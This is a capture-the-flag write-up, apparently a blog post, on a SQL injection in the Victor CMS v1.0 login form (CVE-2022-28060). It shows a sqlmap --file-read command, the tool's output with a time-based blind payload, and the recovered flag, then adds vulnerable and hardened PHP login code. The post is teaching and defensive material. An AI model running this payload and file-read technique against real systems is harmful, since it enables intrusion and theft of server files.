春秋云镜 (Chunqiu Yunjing) - CVE-2022-28060
Victor CMS v1.0 has a SQL injection vulnerability in /includes/login.php.
Locate the login form on the page; judging from the description, this should be a POST-type form injection.
Running sqlmap the usual way, I found the ctf table was empty, so I switched to the --file-read parameter to read a file from the target and get the flag.
root@Lockly temp/tmp » sqlmap -r sql.txt --file-read "/flag" --batch
___ __H__ ___ ___["]_____ ___ ___ {1.7.9#stable} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:08:44 /2023-09-22/
[15:08:44] [INFO] parsing HTTP request from 'sql.txt'
[15:08:46] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:08:46] [INFO] resuming back-end DBMS 'mysql'
[15:08:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: user_name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user_name=admin' AND (SELECT 4341 FROM (SELECT(SLEEP(5)))fdPd) AND 'Winx'='Winx&user_password=123455&login=
---
[15:08:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:08:47] [INFO] fingerprinting the back-end DBMS operating system
[15:08:51] [INFO] the back-end DBMS operating system is Linux
[15:08:51] [INFO] fetching file: '/flag'
[15:08:51] [INFO] retrieved:
[15:08:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
6
[15:09:22] [INFO] adjusting time delay to 1 second due to good response times
66C61677B65613836376236362D353139332D346636642D623765302D6437643634386531643139647D
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[15:16:02] [INFO] retrieved: 42
[15:16:10] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B)
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag (same file)
[15:16:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com'
[*] ending @ 15:16:10 /2023-09-22/
root@Lockly temp/tmp » cat /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag
flag{ea867b66-5193-4f6d-b7e0-d7d648e1d19d}#
root@Lockly temp/tmp »
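The injection point above is the user_name field of a login form where input is spliced straight into the SQL string. The following is an added illustration (not Victor CMS's actual /includes/login.php) of that vulnerable pattern next to a hardened version; the table and column names are assumed.

```php
<?php
// Added example: a login handler in the style of a small PHP CMS, first in
// the vulnerable form and then hardened. Table/column names are assumed.

// --- Vulnerable pattern: user input concatenated into the SQL string.
// A user_name such as  admin' AND (SELECT SLEEP(5)) AND 'x'='x  becomes part
// of the statement, which is exactly what the time-based blind injection
// found by sqlmap relies on.
function login_vulnerable(mysqli $db, string $user, string $pass): ?array
{
    $sql = "SELECT user_id, user_role FROM users "
         . "WHERE user_name = '$user' AND user_password = '$pass'";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// --- Hardened pattern: a prepared statement keeps data separate from the
// query, so quotes and SQL keywords in the input can never change its
// structure. The password is stored as password_hash() output and checked
// with password_verify() instead of being compared inside the query.
function login_hardened(mysqli $db, string $user, string $pass): ?array
{
    $stmt = $db->prepare(
        "SELECT user_id, user_role, user_password FROM users WHERE user_name = ?"
    );
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null || !password_verify($pass, $row['user_password'])) {
        return null;
    }
    unset($row['user_password']);
    return $row;
}
```

Separately, --file-read only succeeds because the CMS's database account holds the MySQL FILE privilege and secure_file_priv does not restrict reads; running the application under an account without FILE and with secure_file_priv set limits an injection to the database contents.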
Author: lockly
Link: https://www.cnblogs.com/bktown/p/17722472.html
Copyright: This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 2.5 China Mainland License.